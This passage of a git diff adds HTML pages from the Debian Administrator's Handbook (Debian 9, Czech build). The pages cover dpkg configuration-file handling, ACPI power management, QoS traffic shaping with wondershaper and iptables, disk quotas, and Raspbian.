+            id="id-1.8.6.7.2"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.3"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.4"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.5"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.6"
+            class="indexterm"></a><div
+            class="para">
+				In addition to the maintainer scripts and control data already mentioned in the previous sections, the <code
+              class="filename">control.tar.gz</code> archive of a Debian package may contain other interesting files. The first, <code
+              class="filename">md5sums</code>, contains the MD5 checksums for all of the package's files. Its main advantage is that it allows <code
+              class="command">dpkg --verify</code> (which we will study in <a
+              class="xref"
+              href="sect.supervision.html#sect.dpkg-verify">14.3.3.1 – „Auditing Packages with <code
+                class="command">dpkg --verify</code>“</a>) to check if these files have been modified since their installation. Note that when this file doesn't exist, <code
+              class="command">dpkg</code> will generate it dynamically at installation time (and store it in the dpkg database just like other control files).
+			</div><div
+            class="para">
+				<code
+              class="filename">conffiles</code> lists package files that must be handled as configuration files. Configuration files can be modified by the administrator, and <code
+              class="command">dpkg</code> will try to preserve those changes during a package update.
+			</div><div
+            class="para">
+				In effect, in this situation, <code
+              class="command">dpkg</code> behaves as intelligently as possible: if the standard configuration file has not changed between the two versions, it does nothing. If, however, the file has changed, it will try to update this file. Two cases are possible: either the administrator has not touched this configuration file, in which case <code
+              class="command">dpkg</code> automatically installs the new version; or the file has been modified, in which case <code
+              class="command">dpkg</code> asks the administrator which version they wish to use (the old one with modifications, or the new one provided with the package). To assist in making this decision, <code
+              class="command">dpkg</code> offers to display a “<code
+              class="command">diff</code>” that shows the difference between the two versions. If the user chooses to retain the old version, the new one will be stored in the same location in a file with the <code
+              class="filename">.dpkg-dist</code> suffix. If the user chooses the new version, the old one is retained in a file with the <code
+              class="filename">.dpkg-old</code> suffix. Another available action consists of momentarily interrupting <code
+              class="command">dpkg</code> to edit the file and attempt to re-instate the relevant modifications (previously identified with <code
+              class="command">diff</code>).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.questions-conffiles"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Avoiding the configuration file questions</strong></p></div></div></div><div
+              class="para">
+				<code
+                class="command">dpkg</code> handles configuration file updates, but, while doing so, regularly interrupts its work to ask for input from the administrator. This makes it less than enjoyable for those who wish to run updates in a non-interactive manner. This is why this program offers options that allow the system to respond automatically according to the same logic: <code
+                class="command">--force-confold</code> retains the old version of the file; <code
+                class="command">--force-confnew</code> will use the new version of the file (these choices are respected, even if the file has not been changed by the administrator, which only rarely has the desired effect). Adding the <code
+                class="command">--force-confdef</code> option tells <code
+                class="command">dpkg</code> to decide by itself when possible (in other words, when the original configuration file has not been touched), and only uses <code
+                class="command">--force-confnew</code> or <code
+                class="command">--force-confold</code> for other cases.
+			</div><div
+              class="para">
+				These options apply to <code
+                class="command">dpkg</code>, but most of the time the administrator will work directly with the <code
+                class="command">aptitude</code> or <code
+                class="command">apt-get</code> programs. It is, thus, necessary to know the syntax used to indicate the options to pass to the <code
+                class="command">dpkg</code> command (their command line interfaces are very similar).
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" full-upgrade</code></strong></pre><div
+              class="para">
+				These options can be stored directly in <code
+                class="command">apt</code>'s configuration. To do so, simply write the following line in the <code
+                class="filename">/etc/apt/apt.conf.d/local</code> file:
+			</div><div
+              class="informalexample"><pre
+                class="programlisting">
+DPkg::options { "--force-confdef"; "--force-confold"; }
+</pre></div><div
+              class="para">
+				Including this option in the configuration file means that it will also be used in a graphical interface such as <code
+                class="command">aptitude</code>.
+			</div></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.questions-conffiles-bis"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Force dpkg to ask configuration file questions</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="command">--force-confask</code> option requires <code
+                class="command">dpkg</code> to display the questions about the configuration files, even in cases where they would not normally be necessary. Thus, when reinstalling a package with this option, <code
+                class="command">dpkg</code> will ask the questions again for all of the configuration files modified by the administrator. This is very convenient, especially for reinstalling the original configuration file if it has been deleted and no other copy is available: a normal re-installation won't work, because <code
+                class="command">dpkg</code> considers removal as a form of legitimate modification, and, thus, doesn't install the desired configuration file.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="packaging-system.html"><strong>Předcházející</strong>Kapitola 5. Packaging System: Tools and Fundament...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.source-package-structure.html"><strong>Další</strong>5.3. Structure of a Source Package</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html
new file mode 100644
index 000000000..8dd445225
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html
@@ -0,0 +1,105 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.hotplug.html"
+        title="9.11. Hot Plugging: hotplug" /><link
+        rel="next"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.power-management.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hotplug.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="network-infrastructure.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.power-management"></a>9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</h2></div></div></div><a
+          id="id-1.12.15.2"
+          class="indexterm"></a><a
+          id="id-1.12.15.3"
+          class="indexterm"></a><div
+          class="para">
+			The topic of power management is often problematic. Indeed, properly suspending the computer requires that all the computer's device drivers know how to put them to standby, and that they properly reconfigure the devices upon waking. Unfortunately, there are still a few devices unable to sleep well under Linux, because their manufacturers have not provided the required specifications.
+		</div><div
+          class="para">
+			Linux supports ACPI (Advanced Configuration and Power Interface) — the most recent standard in power management. The <span
+            class="pkg pkg">acpid</span> package provides a daemon that looks for power management related events (switching between AC and battery power on a laptop, etc.) and that can execute various commands in response.
+		</div><a
+          id="id-1.12.15.6"
+          class="indexterm"></a><a
+          id="id-1.12.15.7"
+          class="indexterm"></a><a
+          id="id-1.12.15.8"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BEWARE</em></span> Graphics card and standby</strong></p></div></div></div><div
+            class="para">
+			The graphics card driver is often the culprit when standby doesn't work properly. In that case, it is a good idea to test the latest version of the X.org graphics server.
+		</div></div><div
+          class="para">
+			After this overview of basic services common to many Unix systems, we will focus on the environment of the administered machines: the network. Many services are required for the network to work properly. They will be discussed in the next chapter.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hotplug.html"><strong>Předcházející</strong>9.11. Hot Plugging: hotplug</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="network-infrastructure.html"><strong>Další</strong>Kapitola 10. Network Infrastructure</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html
new file mode 100644
index 000000000..2bfbc53d1
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html
@@ -0,0 +1,239 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.3. Quality of Service</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.virtual-private-network.html"
+        title="10.2. Virtual Private Network" /><link
+        rel="next"
+        href="sect.dynamic-routing.html"
+        title="10.4. Dynamic Routing" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.quality-of-service.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtual-private-network.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dynamic-routing.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.quality-of-service"></a>10.3. Quality of Service</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.qos-principe"></a>10.3.1. Principle and Mechanism</h3></div></div></div><div
+            class="para">
+				<span
+              class="emphasis"><em>Quality of Service</em></span> (or <span
+              class="emphasis"><em>QoS</em></span> for short) refers to a set of techniques that guarantee or improve the quality of the service provided to applications. The most popular such technique involves classifying the network traffic into categories, and differentiating the handling of traffic according to which category it belongs to. The main application of this differentiated services concept is <span
+              class="emphasis"><em>traffic shaping</em></span>, which limits the data transmission rates for connections related to some services and/or hosts so as not to saturate the available bandwidth and starve important other services. Traffic shaping is a particularly good fit for TCP traffic, since this protocol automatically adapts to available bandwidth.
+			</div><a
+            id="id-1.13.6.2.3"
+            class="indexterm"></a><a
+            id="id-1.13.6.2.4"
+            class="indexterm"></a><a
+            id="id-1.13.6.2.5"
+            class="indexterm"></a><a
+            id="id-1.13.6.2.6"
+            class="indexterm"></a><div
+            class="para">
+				It is also possible to alter the priorities on traffic, which allows prioritizing packets related to interactive services (such as <code
+              class="command">ssh</code> and <code
+              class="command">telnet</code>) or to services that only deal with small blocks of data.
+			</div><div
+            class="para">
+				The Debian kernels include the features required for QoS along with their associated modules. These modules are many, and each of them provides a different service, most notably by way of special schedulers for the queues of IP packets; the wide range of available scheduler behaviors spans the whole range of possible requirements.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> LARTC — <span
+                        class="emphasis"><em>Linux Advanced Routing &amp; Traffic Control</em></span></strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="emphasis"><em>Linux Advanced Routing &amp; Traffic Control</em></span> HOWTO is the reference document covering everything there is to know about network quality of service. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.lartc.org/howto/">http://www.lartc.org/howto/</a></div>
+			</div><a
+              id="id-1.13.6.2.9.3"
+              class="indexterm"></a><a
+              id="id-1.13.6.2.9.4"
+              class="indexterm"></a><a
+              id="id-1.13.6.2.9.5"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.qos-config"></a>10.3.2. Configuring and Implementing</h3></div></div></div><div
+            class="para">
+				QoS parameters are set through the <code
+              class="command">tc</code> command (provided by the <span
+              class="pkg pkg">iproute</span> package). Since its interface is quite complex, using higher-level tools is recommended.
+			</div><a
+            id="id-1.13.6.3.3"
+            class="indexterm"></a><a
+            id="id-1.13.6.3.4"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.qos-wondershaper"></a>10.3.2.1. Reducing Latencies: <code
+                      class="command">wondershaper</code></h4></div></div></div><div
+              class="para">
+					The main purpose of <code
+                class="command">wondershaper</code> (in the similarly-named package) is to minimize latencies independent of network load. This is achieved by limiting total traffic to a value that falls just short of the link saturation value.
+				</div><a
+              id="id-1.13.6.3.5.3"
+              class="indexterm"></a><a
+              id="id-1.13.6.3.5.4"
+              class="indexterm"></a><a
+              id="id-1.13.6.3.5.5"
+              class="indexterm"></a><div
+              class="para">
+					Once a network interface is configured, setting up this traffic limitation is achieved by running <code
+                class="command">wondershaper <em
+                  class="replaceable">interface</em> <em
+                  class="replaceable">download_rate</em> <em
+                  class="replaceable">upload_rate</em></code>. The interface can be <code
+                class="literal">eth0</code> or <code
+                class="literal">ppp0</code> for example, and both rates are expressed in kilobits per second. The <code
+                class="command">wondershaper remove <em
+                  class="replaceable">interface</em></code> command disables traffic control on the specified interface.
+				</div><div
+              class="para">
+					For an Ethernet connection, this script is best called right after the interface is configured. This is done by adding <code
+                class="literal">up</code> and <code
+                class="literal">down</code> directives to the <code
+                class="filename">/etc/network/interfaces</code> file allowing declared commands to be run, respectively, after the interface is configured and before it is deconfigured. For example:
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.network-interfaces"></a><p
+                class="title"><strong>Příklad 10.9. Changes in the <code
+                    class="filename">/etc/network/interfaces</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+iface eth0 inet dhcp
+    up /sbin/wondershaper eth0 500 100
+    down /sbin/wondershaper remove eth0
+</pre></div></div><div
+              class="para">
+					In the PPP case, creating a script that calls <code
+                class="command">wondershaper</code> in <code
+                class="filename">/etc/ppp/ip-up.d/</code> will enable traffic control as soon as the connection is up.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Optimal configuration</strong></p></div></div></div><div
+                class="para">
+					The <code
+                  class="filename">/usr/share/doc/wondershaper/README.Debian.gz</code> file describes, in some detail, the configuration method recommended by the package maintainer. In particular, it advises measuring the download and upload speeds so as to best evaluate real limits.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.qos-config-standard"></a>10.3.2.2. Standard Configuration</h4></div></div></div><div
+              class="para">
+					Barring a specific QoS configuration, the Linux kernel uses the <code
+                class="literal">pfifo_fast</code> queue scheduler, which provides a few interesting features by itself. The priority of each processed IP packet is based on the ToS field (<span
+                class="emphasis"><em>Type of Service</em></span>) of this packet; modifying this field is enough to take advantage of the scheduling features. There are five possible values:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							Normal-Service (0);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Minimize-Cost (2);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Maximize-Reliability (4);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Maximize-Throughput (8);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Minimize-Delay (16).
+						</div></li></ul></div><a
+              id="id-1.13.6.3.6.4"
+              class="indexterm"></a><a
+              id="id-1.13.6.3.6.5"
+              class="indexterm"></a><div
+              class="para">
+					The ToS field can be set by applications that generate IP packets, or modified on the fly by <span
+                class="emphasis"><em>netfilter</em></span>. The following rules are sufficient to increase responsiveness for a server's SSH service:
+				</div><pre
+              class="programlisting scale">
+iptables -t mangle -A PREROUTING -p tcp --sport ssh -j TOS --set-tos Minimize-Delay
+iptables -t mangle -A PREROUTING -p tcp --dport ssh -j TOS --set-tos Minimize-Delay
+</pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtual-private-network.html"><strong>Předcházející</strong>10.2. Virtual Private Network</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dynamic-routing.html"><strong>Další</strong>10.4. Dynamic Routing</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html
new file mode 100644
index 000000000..ae2291bd8
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html
@@ -0,0 +1,162 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.9. Quotas</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.asynchronous-task-scheduling-anacron.html"
+        title="9.8. Scheduling Asynchronous Tasks: anacron" /><link
+        rel="next"
+        href="sect.backup.html"
+        title="9.10. Backup" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.quotas.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.backup.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.quotas"></a>9.9. Quotas</h2></div></div></div><a
+          id="id-1.12.12.2"
+          class="indexterm"></a><div
+          class="para">
+			The quota system allows limiting disk space allocated to a user or group of users. To set it up, you must have a kernel that supports it (compiled with the <code
+            class="varname">CONFIG_QUOTA</code> option) — as is the case with Debian kernels. The quota management software is found in the <span
+            class="pkg pkg">quota</span> Debian package.
+		</div><div
+          class="para">
+			To activate quota in a filesystem, you have to indicate the <code
+            class="literal">usrquota</code> and <code
+            class="literal">grpquota</code> options in <code
+            class="filename">/etc/fstab</code> for the user and group quotas, respectively. Rebooting the computer will then update the quotas in the absence of disk activity (a necessary condition for proper accounting of already used disk space).
+		</div><div
+          class="para">
+			The <code
+            class="command">edquota <em
+              class="replaceable">user</em></code> (or <code
+            class="command">edquota -g <em
+              class="replaceable">group</em></code>) command allows you to change the limits while examining current disk space usage.
+		</div><a
+          id="id-1.12.12.6"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> Defining quotas with a script</strong></p></div></div></div><a
+            id="id-1.12.12.7.2"
+            class="indexterm"></a><div
+            class="para">
+			The <code
+              class="command">setquota</code> program can be used in a script to automatically change many quotas. Its <span
+              class="citerefentry"><span
+                class="refentrytitle">setquota</span>(8)</span> manual page details the syntax to use.
+		</div></div><div
+          class="para">
+			The quota system allows you to set four limits:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					two limits (called “soft” and “hard”) refer to the number of blocks consumed. If the filesystem was created with a block-size of 1 kibibyte, a block contains 1024 bytes from the same file. Unsaturated blocks thus induce losses of disk space. A quota of 100 blocks, which theoretically allows storage of 102,400 bytes, will however be saturated with just 100 files of 500 bytes each, only representing 50,000 bytes in total.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					two limits (soft and hard) refer to the number of inodes used. Each file occupies at least one inode to store information about it (permissions, owner, timestamp of last access, etc.). It is thus a limit on the number of user files.
+				</div></li></ul></div><div
+          class="para">
+			A “soft” limit can be temporarily exceeded; the user will simply be warned that they are exceeding the quota by the <code
+            class="command">warnquota</code> command, which is usually invoked by <code
+            class="command">cron</code>. A “hard” limit can never be exceeded: the system will refuse any operation that will cause a hard quota to be exceeded.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Blocks and inodes</strong></p></div></div></div><a
+            id="id-1.12.12.11.2"
+            class="indexterm"></a><a
+            id="id-1.12.12.11.3"
+            class="indexterm"></a><div
+            class="para">
+			The filesystem divides the hard drive into blocks — small contiguous areas. The size of these blocks is defined during creation of the filesystem, and generally varies between 1 and 8 kibibytes.
+		</div><div
+            class="para">
+			A block can be used either to store the real data of a file, or for meta-data used by the filesystem. Among this meta-data, you will especially find the inodes. An inode uses a block on the hard drive (but this block is not taken into consideration in the block quota, only in the inode quota), and contains both the information on the file to which it corresponds (name, owner, permissions, etc.) and the pointers to the data blocks that are actually used. For very large files that occupy more blocks than it is possible to reference in a single inode, there is an indirect block system; the inode references a list of blocks that do not directly contain data, but another list of blocks.
+		</div></div><a
+          id="id-1.12.12.12"
+          class="indexterm"></a><div
+          class="para">
+			With the <code
+            class="command">edquota -t</code> command, you can define a maximum authorized “grace period” within which a soft limit may be exceeded. After this period, the soft limit will be treated like a hard limit, and the user will have to reduce their disk space usage to within this limit in order to be able to write anything to the hard drive.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> Setting up a default quota for new users</strong></p></div></div></div><div
+            class="para">
+			To automatically setup a quota for new users, you have to configure a template user (with <code
+              class="command">edquota</code> or <code
+              class="command">setquota</code>) and indicate their user name in the <code
+              class="varname">QUOTAUSER</code> variable in the <code
+              class="filename">/etc/adduser.conf</code> file. This quota configuration will then be automatically applied to each new user created with the <code
+              class="command">adduser</code> command.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Předcházející</strong>9.8. Scheduling Asynchronous Tasks: anacron</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.backup.html"><strong>Další</strong>9.10. Backup</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html
new file mode 100644
index 000000000..6d74ec245
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.12. Raspbian</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.doudoulinux.html"
+        title="A.11. DoudouLinux" /><link
+        rel="next"
+        href="sect.other-derivatives.html"
+        title="A.13. And Many More" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.raspbian.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.doudoulinux.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-derivatives.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.raspbian"></a>A.12. Raspbian</h2></div></div></div><a
+          id="id-1.20.15.2"
+          class="indexterm"></a><a
+          id="id-1.20.15.3"
+          class="indexterm"></a><div
+          class="para">
+			Raspbian is a rebuild of Debian optimised for the popular (and inexpensive) Raspberry Pi family of single-board computers. The hardware for that platform is more powerful than what the Debian <span
+            class="architecture architecture">armel</span> architecture can take advantage of, but lacks some features that would be required for <span
+            class="architecture architecture">armhf</span>; so Raspbian is a kind of intermediary, rebuilt specifically for that hardware and including patches targeting this computer only. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://raspbian.org">https://raspbian.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.doudoulinux.html"><strong>Předcházející</strong>A.11. DoudouLinux</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
